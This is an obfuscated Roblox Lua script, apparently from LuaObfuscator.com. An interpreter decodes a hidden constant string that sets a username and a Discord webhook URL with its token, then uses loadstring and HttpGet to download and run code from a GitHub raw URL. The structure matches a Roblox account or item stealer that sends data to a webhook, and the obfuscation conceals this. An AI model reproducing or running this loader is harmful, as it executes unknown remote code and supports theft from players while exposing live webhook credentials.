--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v30=nil;function v30(v31,v32,v33)local v34=v31[1];local v35=v31[2];local v36=v31[3];return function(...)local v66=0;local v67;local v68;local v69;local v70;local v71;while true do if (v66==3) then A,B=v28(v11(v71));if  not A[1] then local v101=v31[4][v67] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v66==2) then v71=nil;function v71()local v91=v34;local v92=v35;local v93=v36;local v94=v28;local v95={};local v96={};local v97={};for v102=0 -0 ,v70 do if ((v102>=v93) or ((3613 -2257)==(4949 -(318 + 72 + 94)))) then v95[v102-v93 ]=v69[v102 + 1 ];else v97[v102]=v69[v102 + (1513 -(1280 + 232)) + 0 ];end end local v98=(v70-v93) + (1765 -(1077 + 687)) ;local v99;local v100;while true do local v103=0 -0 ;local v104;while true do if (((984 + 3377)==(4655 -(143 + (329 -(75 + 103))))) and ((0 + 0)==v103)) then v104=0;while true do if ((v104==(2 -1)) or ((1238 -(88 + 593))>=(5929 -(1197 + 503)))) then if (((15270 -11149)==(12232 -8111)) and (v100<=(11 -7))) then if (((70 + 1103)==(1713 -(271 + 269))) and (v100<=(1 -0))) then if ((v100==((0 -0) -0)) or (497==(714 -((797 -472) + 39)))) then do return;end else v97[v99[3 -(1 -0) ]]=v99[10 -7 ];end elseif ((v100<=2) or (1424<(835 -(188 + 11 + 14)))) then v33[v99[1261 -((1816 -(429 + 909)) + 780) ]]=v97[v99[757 -(658 + 3 + 94) ]];elseif ((v100==(5 -2)) or ((4079 -1273)<(9005 -6306))) then v97[v99[1 + 1 ]]=v99[3]~=(0 + 0 + 0) ;else v67=v99[2 + 1 ];end elseif ((v100<=(6 + 1)) or ((4553 -(3983 -1577))==(1114 -637))) then if ((v100<=(1 + 4)) or ((219 + 255 + 154)>=((1452 -(625 + 34)) + 515))) then if (((11416 -6839)>((25 + 2748) -(398 + (485 -353)))) and (v97[v99[2]]==v99[909 -(681 + 224) ])) then v67=v67 + 1 ;else v67=v99[4 -1 ];end elseif (((745 -474)<=(1484 + 1774)) and (v100>(1239 -(68 + 1165)))) then local v144=452 -(320 + 132) ;local v145;local v146;local v147;while true do if (((4798 -1322)<(5090 -((860 -618) + 816))) and (0==v144)) then local v154=0 -0 ;while true do if ((v154==(1 -0)) or ((506 + 809)>(4642 -(875 + 572)))) then v144=1;break;end if ((v154==(0 -0)) or ((3779 -1256)>(5699 -(195 + 615)))) then v145=465 -(45 + 420) ;v146=nil;v154=2 -1 ;end end end if (((1008 + 3551)>2997) and (v144==(1 -0))) then v147=nil;while true do if (((1585 -(919 + 665))==v145) or (3004<2875)) then v97[v146 + (2 -1) ]=v147;v97[v146]=v147[v99[4]];break;end if ((v145==0) or (1648==(8384 -4771))) then local v169=0 + 0 ;while true do if (((5934 -(246 + 1002))<=4857) and ((1131 -((1373 -(503 + 114)) + 375))==v169)) then local v175=0 -0 ;while true do if ((2818>=(3340 -2142)) and (v175==(1778 -(1678 + 99)))) then v169=1;break;end if ((v175==(1650 -(117 + 194 + 1339))) or ((3216 + 711)<=(4038 -2185))) then v146=v99[1 + 1 + 0 ];v147=v97[v99[1 + 2 ]];v175=1 + 0 ;end end end if (((3802 -(411 + 486))>(294 + 912)) and (v169==(489 -(72 + 416)))) then v145=1;break;end end end end break;end end else v97[v99[638 -(485 + 151) ]]=v33[v99[3]];end elseif ((v100<=8) or (3276<=(4300 -3030))) then local v132=0;local v133;local v134;local v135;local v136;local v137;while true do if ((v132==(1 + 0)) or (2931<(974 -626))) then v135=nil;v136=nil;v132=3 -1 ;end if (((3505 -(592 + 913))<=(5945 -3620)) and (v132==2)) then v137=nil;while true do if ((v133==(1757 -(140 + 1617))) or ((3933 + 177)<1047)) then local v155=0 + 0 ;while true do if (((0 -(1579 -(441 + 1138)))==v155) or (4401==(246 + 3153))) then v134=v99[3 -1 ];v135,v136=v94(v97[v134](v13(v97,v134 + 1 ,v99[4 -1 ])));v155=1;end if ((v155==(1 + 0)) or ((3999 -(469 + 908))==((3758 -(1678 + 18)) + 157))) then v133=1173 -(722 + 450) ;break;end end end if ((((8053 + 695) -6899)==(57 + 1792)) and ((503 -(204 + 297))==v133)) then for v164=v134,v68 do local v165=(0 + 0) -0 ;while true do if (((3480 -(744 + 415))<(6041 -(1222 + 615))) and (v165==0)) then v137=v137 + 1 ;v97[v164]=v135[v137];break;end end end break;end if ((v133==(1 -0)) or ((9076 -5889)>=((14238 -10029) -((69 -20) + 76)))) then local v156=1078 -(135 + (2432 -(1263 + 226))) ;local v157;while true do if (((698 + 61)<=(4280 -1357)) and (v156==(306 -(182 + 124)))) then v157=1292 -(300 + 16 + (2254 -1278)) ;while true do if (((7795 -4550)>=(1118 + 303)) and (v157==(1614 -(1474 + 140)))) then v68=(v136 + v134) -((2418 -(512 + 465)) -(493 + 947)) ;v137=795 -(741 + 54) ;v157=1 + 0 ;end if ((v157==(1 + 0)) or ((4060 -(505 + 88))<=(1905 -415))) then v133=1 + 1 + 0 ;break;end end break;end end end end break;end if ((v132==(1866 -(1608 + 258))) or ((4226 -1536)<(2216 -(334 + 545)))) then v133=0;v134=nil;v132=1;end end elseif ((v100==9) or ((5645 -(304 + 898))<=3484)) then v97[v99[2 + 0 ]]();else local v150=0;local v151;local v152;while true do if ((v150==(1677 -(1135 + 542))) or ((1773 -(136 + 1257))==(3389 + 1244))) then v151=0 + 0 ;v152=nil;v150=1 -0 ;end if ((v150==(1 + 0)) or ((17505 -13701)==(5656 -2626))) then while true do if (((3573 -(888 + 24))>(3008 -(886 + 646))) and (v151==(0 -0))) then v152=v99[1 + 1 ];v97[v152]=v97[v152](v13(v97,v152 + (1550 -(1115 + 434)) ,v68));break;end end break;end end end v67=v67 + 1 ;break;end if (((0 + 0)==v104) or (((1896 -(94 + 115)) + 2317)<=(177 + 292 + 717))) then local v123=0;local v124;while true do if ((v123==(0 -0)) or ((1610 + 2545)<=(4092 -(158 + 51)))) then v124=542 -((2133 -(485 + 1376)) + 270) ;while true do if (((8206 -5714)==((3087 -(347 + 38)) -(6 + 204))) and (v124==(0 + 0))) then v99=v91[v67];v100=v99[1 -0 ];v124=1;end if (((1855 -(951 + 903))==v124) or (2422<(1 + 1219))) then v104=(1 -0) + 0 ;break;end end break;end end end end break;end end end end v66=3;end if (v66==1) then v69={...};v70=v12("#",...) -1 ;v66=2;end if (v66==0) then v67=1;v68= -1;v66=1;end end end;end return v30(v29(),{},v17)(...);end if (v18==2) then function v23()local v37=1144 -(630 + 514) ;local v38;local v39;while true do if ((3 -2)==v37) then return (v39 * 256) + v38 ;end if (v37==(0 -0)) then v38,v39=v1(v16,v19,v19 + (824 -(377 + 445)) );v19=v19 + ((892 -(594 + 295)) -1) ;v37=1 + 0 ;end end end v24=nil;function v24()local v40,v41,v42,v43=v1(v16,v19,v19 + 1 + 2 );v19=v19 + (8 -4) ;return (v43 * (16777814 -(477 + 121))) + (v42 * (41499 + (51731 -27694))) + (v41 * (782 -(362 + 164))) + v40 ;end v25=nil;v18=3;end if (v18==1) then function v21(v44,v45,v46)if v46 then local v74=788 -(551 + (1407 -(562 + 608))) ;local v75;while true do if (v74==(0 -(939 -(227 + 712)))) then v75=(v44/((9 -7)^(v45-(2 -1))))%(((7 -5) -0)^(((v46-(1 + 0)) -(v45-(1 + 0))) + 1 + 0)) ;return v75-(v75%(107 -(37 + 69))) ;end end else local v76=1142 -(1001 + 141) ;local v77;while true do if (v76==(1510 -(144 + 1366))) then v77=(1759 -(972 + 785))^(v45-(3 -(2 + 0))) ;return (((v44%(v77 + v77))>=v77) and (561 -(89 + 471))) or (0 -0) ;end end end end v22=nil;function v22()local v47=0;local v48;while true do if (v47==(1 -0)) then return v48;end if (v47==0) then v48=v1(v16,v19,v19);v19=v19 + (1278 -(68 + 1209)) + 0 ;v47=1981 -(1568 + 216 + 196) ;end end end v23=nil;v18=2;end if (v18==4) then v28=nil;function v28(...)return {...},v12("#",...);end v29=nil;function v29()local v49=0;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v49==(3 -2)) then v54=v24();v55={};for v83=1,v54 do local v84=0 + 0 ;local v85;local v86;local v87;while true do if ((1 + 0)==v84) then v87=nil;while true do if (v85==(0 + 0)) then local v110=0;local v111;while true do if (v110==(1805 -(12 + 1793))) then v111=0 + 0 ;while true do if (v111==1) then v85=205 -(31 + 173) ;break;end if (0~=v111) then else local v125=311 -(27 + 284) ;local v126;while true do if (0==v125) then v126=0;while true do if (v126==1) then v111=1217 -(436 + 780) ;break;end if (v126~=0) then else v86=v22();v87=nil;v126=1;end end break;end end end end break;end end end if (v85~=(1 + 0)) then else if (v86==(1882 -(1516 + 365))) then v87=v22()~=(100 -(60 + 40)) ;elseif (v86==(1435 -(1303 + 130))) then v87=v25();elseif (v86==3) then v87=v26();end v55[v83]=v87;break;end end break;end if (v84~=0) then else local v105=0;while true do if (v105~=(0 + 0)) then else v85=0 + 0 ;v86=nil;v105=1;end if (1==v105) then v84=1;break;end end end end end v53[3]=v22();v49=2;end if (2==v49) then local v82=0;while true do local v88=0 + 0 ;while true do if (v88==0) then if ((0 + 0)~=v82) then else for v113=1,v24() do local v114=0 -0 ;local v115;local v116;local v117;local v118;while true do if (2==v114) then while true do if (v115~=(1 + 0)) then else v118=nil;while true do if (v116==(989 -(743 + 245))) then while true do if (v117==(1838 -(185 + 1653))) then v118=v22();if (v21(v118,1,1)==(0 -0)) then local v158=0;local v159;local v160;local v161;local v162;local v163;while true do if (v158==(1 -0)) then v161=nil;v162=nil;v158=2;end if (v158==0) then v159=0;v160=nil;v158=1;end if (v158~=(37 -(25 + 10))) then else v163=nil;while true do if (v159==(1710 -(876 + 834))) then local v176=0;while true do if (v176~=1) then else v159=1;break;end if (0==v176) then v160=0 + 0 ;v161=nil;v176=1;end end end if (v159~=(1 + 0)) then else local v177=0 -0 ;while true do if (v177~=(32 -(18 + 14))) then else v162=nil;v163=nil;v177=1;end if (v177==1) then v159=4 -2 ;break;end end end if (v159==2) then while true do if (v160~=2) then else local v180=486 -(428 + 58) ;local v181;while true do if (v180==0) then v181=0;while true do if (v181~=(3 -2)) then else v160=3;break;end if (0==v181) then local v189=0 -0 ;local v190;while true do if (v189~=(500 -(69 + 431))) then else v190=0;while true do if (v190==(1 + 0)) then v181=2 -1 ;break;end if (v190~=(0 + 0)) then else local v195=0 -0 ;while true do if (v195==(0 -0)) then if (v21(v162,1,1 + 0 )~=1) then else v163[4 -2 ]=v55[v163[2]];end if (v21(v162,2,2)~=1) then else v163[3 -0 ]=v55[v163[3]];end v195=28 -(13 + 14) ;end if (v195~=(114 -(69 + 44))) then else v190=3 -2 ;break;end end end end break;end end end end break;end end end if ((449 -(223 + 225))==v160) then local v182=0;local v183;while true do if (v182~=0) then else v183=0;while true do if (v183~=0) then else v163={v23(),v23(),nil,nil};if (v161==(0 + 0)) then local v192=0;local v193;while true do if (v192==(0 + 0)) then v193=0;while true do if (v193==0) then v163[933 -(252 + 678) ]=v23();v163[4]=v23();break;end end break;end end elseif (v161==1) then v163[1 + 2 ]=v24();elseif (v161==(4 -2)) then v163[3]=v24() -(2^(1 + 15)) ;elseif (v161==(2 + 1)) then local v199=1682 -(101 + 1581) ;local v200;while true do if ((0 -0)==v199) then v200=0 + 0 ;while true do if (v200~=(1599 -(1079 + 520))) then else v163[3]=v24() -((1 + 1)^(39 -23)) ;v163[1 + 3 ]=v23();break;end end break;end end end v183=136 -(48 + 87) ;end if (v183==(1758 -(642 + 1115))) then v160=2;break;end end break;end end end if (v160~=(895 -(444 + 451))) then else local v184=0;local v185;while true do if (v184==(391 -(277 + 114))) then v185=0 + 0 ;while true do if (0~=v185) then else local v191=0;while true do if (v191~=0) then else v161=v21(v118,1842 -(983 + 857) ,3);v162=v21(v118,4,9 -3 );v191=1;end if (v191==(1 -0)) then v185=1;break;end end end if (v185==(304 -(265 + 38))) then v160=1;break;end end break;end end end if (v160==(1 + 2)) then if (v21(v162,3,3)~=(1 + 0)) then else v163[2 + 2 ]=v55[v163[4]];end v50[v113]=v163;break;end end break;end end break;end end end break;end end break;end if (v116==(0 -0)) then local v140=0 + 0 ;while true do if (v140==0) then local v153=1175 -(737 + 438) ;while true do if (v153==0) then v117=1779 -(1045 + 734) ;v118=nil;v153=1;end if (v153==1) then v140=1 + 0 ;break;end end end if (v140~=1) then else v116=2 -1 ;break;end end end end break;end if (v115~=0) then else local v127=994 -(981 + 13) ;while true do if (v127==(1 + 0)) then v115=1;break;end if (v127==(0 -0)) then v116=0;v117=nil;v127=1131 -(743 + 387) ;end end end end break;end if (v114==(1293 -(1223 + 69))) then v117=nil;v118=nil;v114=2;end if (v114~=0) then else v115=1909 -(1716 + 193) ;v116=nil;v114=1;end end end for v119=1,v24() do v51[v119-(1 + 0) ]=v29();end v82=2 -1 ;end if (1==v82) then for v121=1 -0 ,v24() do v52[v121]=v24();end return v53;end break;end end end end if (v49==0) then v50={};v51={};v52={};v53={v50,v51,nil,v52};v49=1;end end end v18=5;end if (v18==3) then function v25()local v56=v24();local v57=v24();local v58=1269 -(178 + 21 + 1069) ;local v59=(v21(v57,25 -(11 + 13) ,20) * (((2408 -1071) -(1190 + 145))^(1975 -(1382 + 561)))) + v56 ;local v60=v21(v57,1055 -(704 + 330) ,22 + 9 );local v61=((v21(v57,19 + 13 )==(1 + 0)) and  -(4 -(1974 -(687 + 1284)))) or (1 + 0) ;if (v60==0) then if (v59==(0 -0)) then return v61 * (0 -0) ;else v60=2 -(2 -1) ;v58=0 + 0 + 0 ;end elseif (v60==(1562 + 485)) then return ((v59==0) and (v61 * ((1469 -((1371 -(810 + 36)) + 943))/((132 -(15 + 117)) -0)))) or (v61 * NaN) ;end return v8(v61,v60-(2296 -((1850 -(147 + 526)) + (440 -344))) ) * (v58 + (v59/((1410 -(1359 + 49))^(109 -57)))) ;end v26=nil;function v26(v62)local v63;if  not v62 then local v78=1708 -(79 + 1629) ;while true do if (((152 -54) -(39 + 59))==v78) then v62=v24();if (v62==(0 + 0)) then return "";end break;end end end v63=v3(v16,v19,(v19 + v62) -(810 -(509 + 300)) );v19=v19 + v62 ;local v64={};for v72=1 + 0 , #v63 do v64[v72]=v2(v1(v3(v63,v72,v72)));end return v6(v64);end v27=v24;v18=4;end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v65)if (v1(v65,2)==79) then local v79=0;while true do if (v79==0) then v20=v0(v3(v65,1,1));return "";end end else local v80=v2(v0(v65,16));if v20 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v80,v20);v20=nil;v89=1;end end else return v80;end end end);v21=nil;v18=1;end end end v15("LOL!0A3O00028O0003083O00557365724E616D65030C3O004A756B6564796162793O6503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313039352O3130382O333639343036343635302F36343949576D374249782D6157334A376661496D474A737A65424474705872614C74426F76736372353439496C6863725572444634457459514B63642D494D2O30612D57026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E00153O0012013O00013O0026053O000800010001002O043O00080001001201000100033O001202000100023O001201000100053O001202000100043O0012013O00063O0026053O000100010006002O043O00010001001206000100073O001206000200083O0020070002000200090012010004000A4O0003000500014O0008000200054O000A00013O00022O0009000100010001002O043O00140001002O043O000100016O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
